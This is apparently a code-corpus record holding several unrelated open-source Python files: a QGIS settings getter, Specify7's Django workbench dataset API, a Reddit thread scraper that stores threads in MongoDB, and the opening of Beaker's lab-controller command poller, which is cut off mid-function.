    def getGdalPymodPath(self):
        """ Retrieves GDAL python modules location """
        # Same mechanism as getGdalBinPath(): read from the GdalTools settings.
        settings = QSettings()
        return settings.value( "/GdalTools/gdalPymodPath", pystring( "" ) ).toString()
| GeoLabs/QgsWPSClient | streaming.py | Python | gpl-2.0 | 22,331 |
import json
import logging
from typing import List, Optional
from uuid import uuid4
from django import http
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.db import transaction
from django.db.utils import OperationalError
from django.views.decorators.http import require_GET, require_POST, \
require_http_methods
from jsonschema import validate # type: ignore
from jsonschema.exceptions import ValidationError # type: ignore
from specifyweb.specify.api import create_obj, get_object_or_404, obj_to_data, \
toJson, uri_for_model
from specifyweb.specify.views import apply_access_control, login_maybe_required, \
openapi
from specifyweb.specify import models as specify_models
from ..notifications.models import Message
from . import models, tasks
from .upload import upload as uploader, upload_plan_schema
logger = logging.getLogger(__name__)
def regularize_rows(ncols: int, rows: List[List]) -> List[List[str]]:
    """Normalize raw spreadsheet rows to exactly ``ncols + 1`` string cells.

    Each row is padded/trimmed to the column count plus one hidden trailing
    cell (used for per-row info such as disambiguation), every value is
    stringified and stripped, and rows whose visible cells are all blank are
    dropped.
    """
    width = ncols + 1  # extra hidden column at the end of every row

    def clean(raw: List) -> Optional[List[str]]:
        padded = (raw + [''] * width)[:width]
        values = ['' if cell is None else str(cell).strip() for cell in padded]
        if any(values[0:ncols]):
            return values
        return None  # entirely blank visible cells -> drop the row

    return [row for row in (clean(r) for r in rows) if row is not None]
open_api_components = {
'schemas': {
'wb_uploadresult': {
"oneOf": [
{
"type": "string",
"example": "null"
},
{
"type": "object",
"properties": {
"success": {
"type": "boolean",
},
"timestamp": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T22:28:20.033117+00:00",
}
}
}
]
},
"wb_uploaderstatus": {
"oneOf": [
{
"type": "string",
"example": "null",
"description": "Nothing to report"
}, {
"type": "object",
"properties": {
"taskinfo": {
"type": "object",
"properties": {
"current": {
"type": "number",
"example": 4,
},
"total": {
"type": "number",
"example": 20,
}
}
},
"taskstatus": {
"type": "string",
"enum": [
"PROGRESS",
"PENDING",
"FAILURE",
]
},
"uploaderstatus": {
"type": "object",
"properties": {
"operation": {
"type": "string",
"enum": [
'validating',
'uploading',
'unuploading'
]
},
"taskid": {
"type": "string",
"maxLength": 36,
"example": "7d34dbb2-6e57-4c4b-9546-1fe7bec1acca",
}
}
},
},
"description": "Status of the " +
"upload / un-upload / validation process",
}
]
},
"wb_rows": {
"type": "array",
"items": {
"type": "array",
"items": {
"type": "string",
"description": "Cell's value or null"
}
},
"description": "2D array of values",
},
"wb_visualorder": {
"oneOf": [
{
"type": "string",
"description": "null",
},
{
"type": "array",
"items": {
"type": "number",
},
"description": "The order to show columns in",
}
]
},
"wb_uploadplan": {
"type": "object",
"properties": {
},
"description": "Upload Plan. Schema - " +
"https://github.com/specify/specify7/blob/5fb51a7d25d549248505aec141ae7f7cdc83e414/specifyweb/workbench/upload/upload_plan_schema.py#L14"
},
"wb_validation_results": {
"type": "object",
"properties": {},
"description": "Schema: " +
"https://github.com/specify/specify7/blob/19ebde3d86ef4276799feb63acec275ebde9b2f4/specifyweb/workbench/upload/validation_schema.py",
},
"wb_upload_results": {
"type": "object",
"properties": {},
"description": "Schema: " +
"https://github.com/specify/specify7/blob/19ebde3d86ef4276799feb63acec275ebde9b2f4/specifyweb/workbench/upload/upload_results_schema.py",
}
}
}
@openapi(schema={
"get": {
"parameters": [
{
"name": "with_plan",
"in": "query",
"required": False,
"schema": {
"type": "string"
},
"description": "If parameter is present, limit results to data sets with upload plans."
}
],
"responses": {
"200": {
"description": "Data fetched successfully",
"content": {
"application/json": {
"schema": {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": {
"type": "number",
"minimum": 0,
"description": "Data Set ID",
},
"name": {
"type": "string",
"description": "Data Set Name",
},
"uploadresult": {
"$ref": "#/components/schemas/wb_uploadresult"
},
"uploaderstatus": {
"$ref": "#/components/schemas/wb_uploaderstatus",
},
"timestampcreated": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T13:16:07.774"
},
"timestampmodified": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T13:50:41.710",
}
},
'required': ['id', 'name', 'uploadresult', 'uploaderstatus', 'timestampcreated', 'timestampmodified'],
'additionalProperties': False
}
}
}
}
}
}
},
'post': {
"requestBody": {
"required": True,
"description": "A JSON representation of a new Data Set",
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"name": {
"type": "string",
"description": "Data Set name",
},
"columns": {
"type": "array",
"items": {
"type": "string",
"description": "A name of the column",
},
"description": "A unique array of strings",
},
"rows": {
"$ref": "#/components/schemas/wb_rows",
},
"importedfilename": {
"type": "string",
"description": "The name of the original file",
}
},
'required': ['name', 'columns', 'rows', 'importedfilename'],
'additionalProperties': False
}
}
}
},
"responses": {
"201": {
"description": "Data created successfully",
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"id": {
"type": "number",
"description": "Data Set ID",
},
"name": {
"type": "string",
"description":
"Data Set name (may differ from the one " +
"in the request object as part of " +
"ensuring names are unique)"
},
},
'required': ['name', 'id'],
'additionalProperties': False
}
}
}
}
}
}
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_http_methods(["GET", "POST"])
@transaction.atomic
def datasets(request) -> http.HttpResponse:
    """RESTful list of user's WB datasets. POSTing will create a new dataset.

    GET: returns summary info (id, name, upload status, timestamps) for each
    data set owned by the requesting user in the current collection; the
    ``with_plan`` query parameter restricts the list to data sets that have
    an upload plan.
    POST: expects a JSON body with 'name', 'columns', 'rows' and
    'importedfilename'; answers 201 with the new data set's id and name.
    """
    if request.method == "POST":
        data = json.load(request)
        columns = data['columns']
        # Validate the container type *before* iterating it: with the
        # original operand order, a non-iterable value (e.g. a number)
        # raised TypeError inside any() and surfaced as a 500 instead of
        # the intended 400.
        if not isinstance(columns, list) or any(not isinstance(c, str) for c in columns):
            return http.HttpResponse(f"all column headers must be strings: {columns}", status=400)
        if len(set(columns)) != len(columns):
            return http.HttpResponse(f"all column headers must be unique: {columns}", status=400)
        # Pad/trim each row to the column count and drop fully blank rows.
        rows = regularize_rows(len(columns), data['rows'])
        ds = models.Spdataset.objects.create(
            specifyuser=request.specify_user,
            collection=request.specify_collection,
            name=data['name'],
            columns=columns,
            data=rows,
            importedfilename=data['importedfilename'],
            createdbyagent=request.specify_user_agent,
            modifiedbyagent=request.specify_user_agent,
        )
        return http.JsonResponse({"id": ds.id, "name": ds.name}, status=201)
    else:
        # GET: only fetch the summary attributes we are going to serialize.
        attrs = ('name', 'uploadresult', 'uploaderstatus', 'timestampcreated', 'timestampmodified')
        dss = models.Spdataset.objects.filter(specifyuser=request.specify_user, collection=request.specify_collection).only(*attrs)
        if 'with_plan' in request.GET:
            dss = dss.filter(uploadplan__isnull=False)
        return http.JsonResponse([{'id': ds.id, **{attr: getattr(ds, attr) for attr in attrs}} for ds in dss], safe=False)
@openapi(schema={
"get": {
"responses": {
"200": {
"description": "Successful response",
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"id": {
"type": "number",
"description": "Data Set ID",
},
"name": {
"type": "string",
"description": "Data Set name",
},
"columns": {
"type": "array",
"items": {
"type": "string",
"description": "A name of the column",
},
"description": "A unique array of strings",
},
"visualorder": {
"$ref": "#/components/schemas/wb_visualorder"
},
"rows": {
"$ref": "#/components/schemas/wb_rows"
},
"uploadplan": {
"$ref": "#/components/schemas/wb_uploadplan"
},
"uploadresult": {
"$ref": "#/components/schemas/wb_uploadresult"
},
"uploaderstatus": {
"$ref": "#/components/schemas/wb_uploaderstatus"
},
"importedfilename": {
"type": "string",
"description": "The name of the original file",
},
"remarks": {
"type": "string",
},
"timestampcreated": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T13:16:07.774"
},
"timestampmodified": {
"type": "string",
"format": "datetime",
"example": "2021-04-28T13:50:41.710",
}
},
'required': ['id', 'name', 'columns', 'visualorder', 'rows', 'uploadplan', 'uploadresult',
'uploaderstatus', 'importedfilename', 'remarks', 'timestampcreated', 'timestampmodified'],
'additionalProperties': False
}
}
}
}
}
},
'put': {
"requestBody": {
"required": True,
"description": "A JSON representation of updates to the data set",
"content": {
"application/json": {
"schema": {
"type": "object",
"properties": {
"name": {
"type": "string",
"description": "Data Set name",
},
"remarks": {
"type": "string",
},
"visualorder": {
"$ref": "#/components/schemas/wb_visualorder"
},
"uploadplan": {
"$ref": "#/components/schemas/wb_uploadplan"
},
},
'additionalProperties': False
}
}
}
},
"responses": {
"204": {"description": "Data set updated."},
"409": {"description": "Dataset in use by uploader."}
}
},
"delete": {
"responses": {
"204": {"description": "Data set deleted."},
"409": {"description": "Dataset in use by uploader"}
}
}
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_http_methods(["GET", "PUT", "DELETE"])
@transaction.atomic
def dataset(request, ds_id: str) -> http.HttpResponse:
    """RESTful endpoint for dataset <ds_id>. Supports GET PUT and DELETE.

    GET returns the complete data set (rows, plan, results, agents).
    PUT updates name/remarks/visualorder/uploadplan; DELETE removes the
    data set.  Both mutating methods answer 409 while the uploader is
    working on the data set.
    """
    try:
        ds = models.Spdataset.objects.get(id=ds_id)
    except ObjectDoesNotExist:
        return http.HttpResponseNotFound()
    # Only the owner may see or modify a data set.
    if ds.specifyuser != request.specify_user:
        return http.HttpResponseForbidden()
    if request.method == "GET":
        return http.JsonResponse(dict(
            id=ds.id,
            name=ds.name,
            columns=ds.columns,
            visualorder=ds.visualorder,
            rows=ds.data,
            # uploadplan/rowresults are stored as JSON strings; decode them
            # so the client receives structured data.
            uploadplan=ds.uploadplan and json.loads(ds.uploadplan),
            uploaderstatus=ds.uploaderstatus,
            uploadresult=ds.uploadresult,
            rowresults=ds.rowresults and json.loads(ds.rowresults),
            remarks=ds.remarks,
            importedfilename=ds.importedfilename,
            timestampcreated=ds.timestampcreated,
            timestampmodified=ds.timestampmodified,
            createdbyagent=uri_for_model('agent', ds.createdbyagent_id) if ds.createdbyagent_id is not None else None,
            modifiedbyagent=uri_for_model('agent', ds.modifiedbyagent_id) if ds.modifiedbyagent_id is not None else None,
        ))
    # Mutating methods: re-fetch the row under a lock so concurrent requests
    # and the uploader cannot race against us.
    with transaction.atomic():
        ds = models.Spdataset.objects.select_for_update().get(id=ds_id)
        if request.method == "PUT":
            attrs = json.load(request)
            if 'name' in attrs:
                ds.name = attrs['name']
            if 'remarks' in attrs:
                ds.remarks = attrs['remarks']
            if 'visualorder' in attrs:
                ds.visualorder = attrs['visualorder']
                assert ds.visualorder is None or (isinstance(ds.visualorder, list) and len(ds.visualorder) == len(ds.columns))
            if 'uploadplan' in attrs:
                plan = attrs['uploadplan']
                try:
                    validate(plan, upload_plan_schema.schema)
                except ValidationError as e:
                    return http.HttpResponse(f"upload plan is invalid: {e}", status=400)
                if ds.uploaderstatus != None:
                    return http.HttpResponse('dataset in use by uploader', status=409)
                if ds.was_uploaded():
                    return http.HttpResponse('dataset has been uploaded. changing upload plan not allowed.', status=400)
                # The new plan may reference columns the data set lacks; add
                # them (empty) just before the hidden trailing cell.
                new_cols = upload_plan_schema.parse_plan(request.specify_collection, plan).get_cols() - set(ds.columns)
                if new_cols:
                    ncols = len(ds.columns)
                    ds.columns += list(new_cols)
                    for i, row in enumerate(ds.data):
                        ds.data[i] = row[:ncols] + [""]*len(new_cols) + row[ncols:]
                ds.uploadplan = json.dumps(plan)
                # Changing the plan invalidates any previous results.
                ds.rowresults = None
                ds.uploadresult = None
            ds.save()
            return http.HttpResponse(status=204)
        if request.method == "DELETE":
            if ds.uploaderstatus != None:
                return http.HttpResponse('dataset in use by uploader', status=409)
            ds.delete()
            return http.HttpResponse(status=204)
        # require_http_methods guarantees one of the branches above matched.
        assert False, "Unexpected HTTP method"
@openapi(schema={
"get": {
"responses": {
"200": {
"description": "Successful response",
"content": {
"application/json": {
"schema": {
"type": "array",
"items": {
"type": "array",
"items": {
"type": "string",
"description": "Cell value"
}
},
"description":
"2d array of cells. NOTE: last column would contain " +
"disambiguation results as a JSON object or be an " +
"empty string"
}
}
}
}
}
},
'put': {
"requestBody": {
"required": True,
"description": "A JSON representation of a spreadsheet",
"content": {
"application/json": {
"schema": {
"type": "array",
"items": {
"type": "array",
"items": {
"type": "string",
"description": "Cell value"
}
},
"description":
"2d array of cells. NOTE: last column should contain " +
"disambiguation results as a JSON object or be an " +
"empty string"
}
}
}
},
"responses": {
"204": {"description": "Data set rows updated."},
"409": {"description": "Dataset in use by uploader"}
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_http_methods(["GET", "PUT"])
@transaction.atomic
def rows(request, ds_id: str) -> http.HttpResponse:
    """Returns (GET) or sets (PUT) the row data for dataset <ds_id>."""
    try:
        ds = models.Spdataset.objects.select_for_update().get(id=ds_id)
    except ObjectDoesNotExist:
        return http.HttpResponseNotFound()
    if ds.specifyuser != request.specify_user:
        return http.HttpResponseForbidden()
    if request.method == "GET":
        return http.JsonResponse(ds.data, safe=False)
    # PUT: replace the dataset rows wholesale.
    if ds.uploaderstatus is not None:
        return http.HttpResponse('dataset in use by uploader.', status=409)
    if ds.was_uploaded():
        return http.HttpResponse('dataset has been uploaded. changing data not allowed.', status=400)
    # Normalize incoming rows and invalidate any stale results.
    ds.data = regularize_rows(len(ds.columns), json.load(request))
    ds.rowresults = None
    ds.uploadresult = None
    ds.modifiedbyagent = request.specify_user_agent
    ds.save()
    return http.HttpResponse(status=204)
@openapi(schema={
'post': {
"responses": {
"200": {
"description": "Returns a GUID (job ID)",
"content": {
"text/plain": {
"schema": {
"type": "string",
"maxLength": 36,
"example": "7d34dbb2-6e57-4c4b-9546-1fe7bec1acca",
}
}
}
},
"409": {"description": "Dataset in use by uploader"}
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def upload(request, ds_id, no_commit: bool, allow_partial: bool) -> http.HttpResponse:
    """Initiates an upload or validation of dataset <ds_id>.

    With no_commit=True this only validates; actually committing data
    requires a Manager account.  Returns the Celery task id as JSON.
    """
    ds = get_object_or_404(models.Spdataset, id=ds_id)
    if ds.specifyuser != request.specify_user:
        return http.HttpResponseForbidden()
    # Validation is open to any user; committing requires a manager.
    if request.specify_user.usertype != 'Manager' and not no_commit:
        return http.HttpResponseForbidden("Only manager users may upload data sets.")
    with transaction.atomic():
        # Re-fetch under a row lock so two uploads cannot start concurrently.
        ds = models.Spdataset.objects.select_for_update().get(id=ds_id)
        if ds.uploaderstatus is not None:
            return http.HttpResponse('dataset in use by uploader.', status=409)
        if ds.collection != request.specify_collection:
            return http.HttpResponse('dataset belongs to a different collection.', status=400)
        if ds.was_uploaded():
            return http.HttpResponse('dataset has already been uploaded.', status=400)
        # Choose the task id ourselves so it can be recorded on the data set
        # in the same transaction that launches the task.
        taskid = str(uuid4())
        async_result = tasks.upload.apply_async([
            request.specify_collection.id,
            request.specify_user_agent.id,
            ds_id,
            no_commit,
            allow_partial
        ], task_id=taskid)
        ds.uploaderstatus = {
            'operation': "validating" if no_commit else "uploading",
            'taskid': taskid
        }
        ds.save(update_fields=['uploaderstatus'])
    return http.JsonResponse(async_result.id, safe=False)
@openapi(schema={
'post': {
"responses": {
"200": {
"description": "Returns a GUID (job ID)",
"content": {
"text/plain": {
"schema": {
"type": "string",
"maxLength": 36,
"example": "7d34dbb2-6e57-4c4b-9546-1fe7bec1acca",
}
}
}
},
"409": {"description": "Dataset in use by uploader"}
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def unupload(request, ds_id: int) -> http.HttpResponse:
    """Initiates an unupload of dataset <ds_id>.

    Reverses a previous upload.  Manager-only.  Returns the Celery task id.
    """
    ds = get_object_or_404(models.Spdataset, id=ds_id)
    if ds.specifyuser != request.specify_user:
        return http.HttpResponseForbidden()
    if request.specify_user.usertype != 'Manager':
        return http.HttpResponseForbidden("Only manager users may un-upload data sets.")
    with transaction.atomic():
        # Re-fetch under a row lock so the uploader cannot race against us.
        ds = models.Spdataset.objects.select_for_update().get(id=ds_id)
        if ds.uploaderstatus is not None:
            return http.HttpResponse('dataset in use by uploader.', status=409)
        if not ds.was_uploaded():
            return http.HttpResponse('dataset has not been uploaded.', status=400)
        # Record the task id on the data set before the task can start.
        taskid = str(uuid4())
        async_result = tasks.unupload.apply_async([ds.id, request.specify_user_agent.id], task_id=taskid)
        ds.uploaderstatus = {
            'operation': "unuploading",
            'taskid': taskid
        }
        ds.save(update_fields=['uploaderstatus'])
    return http.JsonResponse(async_result.id, safe=False)
# @login_maybe_required
@openapi(schema={
'get': {
"responses": {
"200": {
"description": "Data fetched successfully",
"content": {
"text/plain": {
"schema": {
"$ref": "#/components/schemas/wb_uploaderstatus",
}
}
}
},
}
},
}, components=open_api_components)
@require_GET
def status(request, ds_id: int) -> http.HttpResponse:
    """Returns the uploader status for the dataset <ds_id>.

    Answers null when no operation is in progress, otherwise the recorded
    uploaderstatus plus the Celery task state/progress.
    """
    # NOTE(review): the authentication decorator above this view is commented
    # out, so this endpoint is reachable anonymously -- confirm intentional.
    ds = get_object_or_404(models.Spdataset, id=ds_id)
    # if (wb.specifyuser != request.specify_user):
    #     return http.HttpResponseForbidden()
    if ds.uploaderstatus is None:
        return http.JsonResponse(None, safe=False)
    # Map the recorded operation back to the Celery task that performs it so
    # its state can be queried.
    task = {
        'uploading': tasks.upload,
        'validating': tasks.upload,
        'unuploading': tasks.unupload,
    }[ds.uploaderstatus['operation']]
    result = task.AsyncResult(ds.uploaderstatus['taskid'])
    status = {
        'uploaderstatus': ds.uploaderstatus,
        'taskstatus': result.state,
        # result.info is a progress dict while running, an exception on failure.
        'taskinfo': result.info if isinstance(result.info, dict) else repr(result.info)
    }
    return http.JsonResponse(status)
@openapi(schema={
'post': {
"responses": {
"200": {
"description": "Returns either 'ok' if a task is aborted " +
" or 'not running' if no task exists.",
"content": {
"text/plain": {
"schema": {
"type": "string",
"enum": [
"ok",
"not running"
]
}
}
}
},
"503": {
"description": "Indicates the process could not be terminated.",
"content": {
"text/plain": {
"schema": {
"type": "string",
"enum": [
'timed out waiting for requested task to terminate'
]
}
}
}
},
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def abort(request, ds_id: int) -> http.HttpResponse:
    """Aborts any ongoing uploader operation for dataset <ds_id>.

    Revokes the Celery task with terminate=True and clears the recorded
    uploaderstatus; answers 503 if the task's row lock does not clear.
    """
    ds = get_object_or_404(models.Spdataset, id=ds_id)
    if ds.specifyuser != request.specify_user:
        return http.HttpResponseForbidden()
    if ds.uploaderstatus is None:
        return http.HttpResponse('not running', content_type='text/plain')
    # Find the Celery task behind the recorded operation and terminate it.
    task = {
        'uploading': tasks.upload,
        'validating': tasks.upload,
        'unuploading': tasks.unupload,
    }[ds.uploaderstatus['operation']]
    result = task.AsyncResult(ds.uploaderstatus['taskid']).revoke(terminate=True)
    try:
        models.Spdataset.objects.filter(id=ds_id).update(uploaderstatus=None)
    except OperationalError as e:
        if e.args[0] == 1205: # (1205, 'Lock wait timeout exceeded; try restarting transaction')
            # The uploader still holds the row lock, i.e. the task has not
            # actually terminated within the lock-wait window.
            return http.HttpResponse(
                'timed out waiting for requested task to terminate',
                status=503,
                content_type='text/plain'
            )
        else:
            raise
    return http.HttpResponse('ok', content_type='text/plain')
@openapi(schema={
'get': {
"responses": {
"200": {
"description": "Successful operation",
"content": {
"text/plain": {
"schema": {
"type": "array",
"items": {
"$ref": "#/components/schemas/wb_upload_results",
}
}
}
}
},
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_GET
def upload_results(request, ds_id: int) -> http.HttpResponse:
    """Returns the detailed upload/validation results if any for the dataset <ds_id>.

    Answers null when no results have been produced yet.
    """
    ds = get_object_or_404(models.Spdataset, id=ds_id)
    if ds.specifyuser != request.specify_user:
        return http.HttpResponseForbidden()
    if ds.rowresults is None:
        return http.JsonResponse(None, safe=False)
    # rowresults is stored as a JSON string; decode before returning.
    results = json.loads(ds.rowresults)
    # In development builds, double-check the stored results against the schema.
    if settings.DEBUG:
        from .upload.upload_results_schema import schema
        validate(results, schema)
    return http.JsonResponse(results, safe=False)
@openapi(schema={
'post': {
"requestBody": {
"required": True,
"description": "A row to validate",
"content": {
"application/json": {
"schema": {
"type": "array",
"items": {
"type": "string",
"description": "Cell value"
},
}
}
}
},
"responses": {
"200": {
"description": "Returns upload results for a single row.",
"content": {
"text/plain": {
"schema": {
"type": "object",
"properties": {
"results": {
"$ref": "#/components/schemas/wb_upload_results"
},
},
'required': ['results'],
'additionalProperties': False
}
}
}
},
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def validate_row(request, ds_id: str) -> http.HttpResponse:
    """Validates a single row for dataset <ds_id>.

    The row is passed as a JSON array of cell values in the request body.
    Answers null for a fully blank row, otherwise the row's validation result.
    """
    ds = get_object_or_404(models.Spdataset, id=ds_id)
    collection = request.specify_collection
    bt, upload_plan = uploader.get_ds_upload_plan(collection, ds)
    row = json.loads(request.body)
    ncols = len(ds.columns)
    # Normalize the row (pad/trim, stringify); blank rows are dropped.
    rows = regularize_rows(ncols, [row])
    if not rows:
        return http.JsonResponse(None, safe=False)
    row = rows[0]
    # The hidden trailing cell may carry per-row disambiguation info.
    da = uploader.get_disambiguation_from_row(ncols, row)
    result = uploader.validate_row(collection, upload_plan, request.specify_user_agent.id, dict(zip(ds.columns, row)), da)
    # NOTE(review): the OpenAPI schema for this endpoint declares the key
    # 'results', but the response uses 'result' -- confirm which is correct.
    return http.JsonResponse({'result': result.to_json()})
@openapi(schema={
'get': {
"responses": {
"200": {
"description": "Returns the upload plan schema, like defined here: " +
"https://github.com/specify/specify7/blob/19ebde3d86ef4276799feb63acec275ebde9b2f4/specifyweb/workbench/upload/upload_plan_schema.py",
"content": {
"text/plain": {
"schema": {
"type": "object",
"properties": {},
}
}
}
},
}
},
}, components=open_api_components)
@require_GET
def up_schema(request) -> http.HttpResponse:
    """Serve the JSON schema that upload plans must validate against."""
    schema = upload_plan_schema.schema
    return http.JsonResponse(schema)
@openapi(schema={
'post': {
"requestBody": {
"required": True,
"description": "User ID of the new owner",
"content": {
"application/x-www-form-urlencoded": {
"schema": {
"type": "object",
"properties": {
"specifyuserid": {
"type": "number",
"description": "User ID of the new owner"
},
},
'required': ['specifyuserid'],
'additionalProperties': False
}
}
}
},
"responses": {
"204": {"description": "Dataset transfer succeeded."},
}
},
}, components=open_api_components)
@login_maybe_required
@apply_access_control
@require_POST
def transfer(request, ds_id: int) -> http.HttpResponse:
    """Transfer dataset's ownership to a different user.

    Expects a form-encoded 'specifyuserid' parameter identifying the new
    owner, and leaves a notification message for them.
    """
    if 'specifyuserid' not in request.POST:
        return http.HttpResponseBadRequest("missing parameter: specifyuserid")
    ds = get_object_or_404(models.Spdataset, id=ds_id)
    # Only the current owner may give the data set away.
    if ds.specifyuser != request.specify_user:
        return http.HttpResponseForbidden()
    Specifyuser = getattr(specify_models, 'Specifyuser')
    try:
        ds.specifyuser = Specifyuser.objects.get(id=request.POST['specifyuserid'])
    except Specifyuser.DoesNotExist:
        return http.HttpResponseBadRequest("the user does not exist")
    # Notify the new owner via the notifications app.
    Message.objects.create(user=ds.specifyuser, content=json.dumps({
        'type': 'dataset-ownership-transferred',
        'previous-owner-name': request.specify_user.name,
        'dataset-name': ds.name,
        'dataset-id': ds_id,
    }))
    ds.save()
    return http.HttpResponse(status=204)
| specify/specify7 | specifyweb/workbench/views.py | Python | gpl-2.0 | 37,610 |
from pymongo import MongoClient
import json
import requests
import time
from datetime import datetime
def subredditInfo(sr, limit=100, sorting="top", period="day",
                  user_agent="ChicagoSchool's scraper", **kwargs):
    """retrieves X (max 100) amount of stories in a subreddit
    'sorting' is whether or not the sorting of the reddit should be customized or not,
    if it is: Allowed passing params/queries such as t=hour, week, month, year or all

    Fix: the previous version built a `parameters` dict (including **kwargs)
    but never used it, so extra keyword arguments were silently dropped.
    The query is now passed through requests' `params`, which also handles
    URL-encoding.
    """
    # query to send
    parameters = {"limit": limit, "t": period}
    parameters.update(kwargs)
    url = "http://www.reddit.com/r/%s/%s.json" % (sr, sorting)
    r = requests.get(url, params=parameters, headers={"user-agent": user_agent})
    j = json.loads(r.text)
    # return list of stories
    return list(j["data"]["children"])
def extractContent(link, sub, limit=100, sorting="top",
                   user_agent="ChicagoSchool's scraper", **kwargs):
    """Fetch a thread's JSON and wrap it in a document ready for MongoDB.

    The returned dict carries the thread's creation date, its permalink,
    the subreddit name and the raw JSON payload.
    """
    url = "http://www.reddit.com/%s.json?sort=%s&limit=%d" % (link, sorting, limit)
    response = requests.get(url, headers={"user-agent": user_agent})
    thread = json.loads(response.text)
    created = thread[0]["data"]["children"][0]["data"]["created"]
    posted_on = datetime.fromtimestamp(created)
    return {"date": posted_on, "link": link, "subreddit": sub, "content": thread}
def dbScraper(db_n, col_n, sub_l):
    """scrapes all the threads for a subreddit and stores them in a
    mongodb db

    db_n: MongoDB database name; col_n: collection name; sub_l: list of
    subreddit names.  Runs forever, doing at most one full pass per day.
    (Python 2 only: uses `print` statements.)
    """
    m_ind = 0
    t_f = datetime.now()  # overall start time, for progress reporting
    sub_ln = len(sub_l)
    client = MongoClient()
    db = client[db_n]
    col = db[col_n]
    while True:
        t_1 = datetime.now()  # start of this daily pass
        for i, s in enumerate(sub_l):
            # Fetch the day's top stories; on failure back off 5 minutes
            # and retry once (a second failure propagates).
            try:
                sub_info = subredditInfo(s)
            except Exception as e:
                print e
                time.sleep(300)
                sub_info = subredditInfo(s)
            time.sleep(2)
            sub_info_ln = len(sub_info)
            for j, l in enumerate(sub_info):
                link = l["data"]["permalink"]
                # Download and store the thread; retry with increasing
                # back-off (1 min, then 5 min) before giving up on it.
                try:
                    content = extractContent(link, s)
                    col.insert(content)
                except Exception as e:
                    print e
                    time.sleep(60)
                    try:
                        content = extractContent(link, s)
                        col.insert(content)
                    except Exception as e:
                        print e
                        time.sleep(300)
                # Progress: % subreddits done, % threads done, counters,
                # elapsed time for this pass and overall.
                print i * 100. / sub_ln, j * 100. / sub_info_ln, m_ind, i, j, datetime.now() - t_1, datetime.now() - t_f
                time.sleep(2)
        # now we wait until a full day has passed since we started our search
        t_diff = datetime.now() - t_1
        while t_diff.days < 1:
            time.sleep(60)
            t_diff = datetime.now() - t_1
| lbybee/reddit_spelling_index | reddit_db_scraper.py | Python | gpl-2.0 | 2,876 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import sys
import os, os.path
import errno
import logging
import time
import random
import signal
import daemon
import datetime
import pkg_resources
import subprocess
import xmlrpclib
from daemon import pidfile
from optparse import OptionParser
import gevent, gevent.hub, gevent.socket, gevent.event, gevent.monkey
from bkr.labcontroller.exceptions import ShutdownException
from bkr.log import log_to_stream, log_to_syslog
from bkr.common.helpers import SensitiveUnicode, total_seconds
from bkr.labcontroller.config import load_conf, get_conf
from bkr.labcontroller.proxy import ProxyHelper
from bkr.labcontroller import netboot
logger = logging.getLogger(__name__)
class CommandQueuePoller(ProxyHelper):
    def __init__(self, *args, **kwargs):
        """Initialise poller bookkeeping; all arguments go to ProxyHelper."""
        super(CommandQueuePoller, self).__init__(*args, **kwargs)
        self.commands = {} #: dict of (id -> command info) for running commands
        self.greenlets = {} #: dict of (command id -> greenlet which is running it)
        self.last_command_datetime = {} # Last time a command was run against a system.
    def get_queued_commands(self):
        """Fetch queued command details from the Beaker server over XML-RPC.

        Re-authenticates and retries once when the server session has
        expired.  Power passwords are wrapped in SensitiveUnicode so they
        do not leak into logs.
        """
        try:
            commands = self.hub.labcontrollers.get_queued_command_details()
        except xmlrpclib.Fault as fault:
            if 'Anonymous access denied' in fault.faultString:
                logger.debug('Session expired, re-authenticating')
                self.hub._login()
                commands = self.hub.labcontrollers.get_queued_command_details()
            else:
                raise
        for command in commands:
            # The 'is not None' check is important as we do not want to
            # stringify the None type
            if 'power' in command and 'passwd' in command['power'] and \
                    command['power']['passwd'] is not None:
                command['power']['passwd'] = SensitiveUnicode(command['power']['passwd'])
        return commands
    def get_running_command_ids(self):
        """Return ids of commands the server believes this LC is running.

        Re-authenticates and retries once when the server session expired.
        """
        try:
            ids = self.hub.labcontrollers.get_running_command_ids()
        except xmlrpclib.Fault as fault:
            if 'Anonymous access denied' in fault.faultString:
                logger.debug('Session expired, re-authenticating')
                self.hub._login()
                ids = self.hub.labcontrollers.get_running_command_ids()
            else:
                raise
        return ids
    def mark_command_running(self, id):
        """Report to the server that command *id* has started executing."""
        self.hub.labcontrollers.mark_command_running(id)
    def mark_command_completed(self, id):
        """Report to the server that command *id* finished successfully."""
        self.hub.labcontrollers.mark_command_completed(id)
    def mark_command_failed(self, id, message, system_broken):
        """Report failure of command *id*; may also flag the system as broken."""
        self.hub.labcontrollers.mark_command_failed(id, message, system_broken)
    def mark_command_aborted(self, id, message):
        """Report that command *id* was aborted without completing."""
        self.hub.labcontrollers.mark_command_aborted(id, message)
    def clear_running_commands(self, message):
        """Ask the server to clear every command recorded as running here."""
        self.hub.labcontrollers.clear_running_commands(message)
def clear_orphaned_commands(self):
running_command_ids = self.get_running_command_ids()
orphaned_command_ids = set(running_command_ids).difference(self.commands.keys())
for id in orphaned_command_ids:
self.mark_command_aborted(id, "Command orphaned, aborting")
    def poll(self):
        """One polling cycle: abort orphans, then spawn handlers for new work."""
        logger.debug('Clearing orphaned commands')
        self.clear_orphaned_commands()
        logger.debug('Polling for queued commands')
        for command in self.get_queued_commands():
            if command['id'] in self.commands:
                # We've already seen it, ignore
                continue
            # This command has to wait for any other existing commands against the
            # same system, to prevent collisions
            predecessors = [self.greenlets[c['id']]
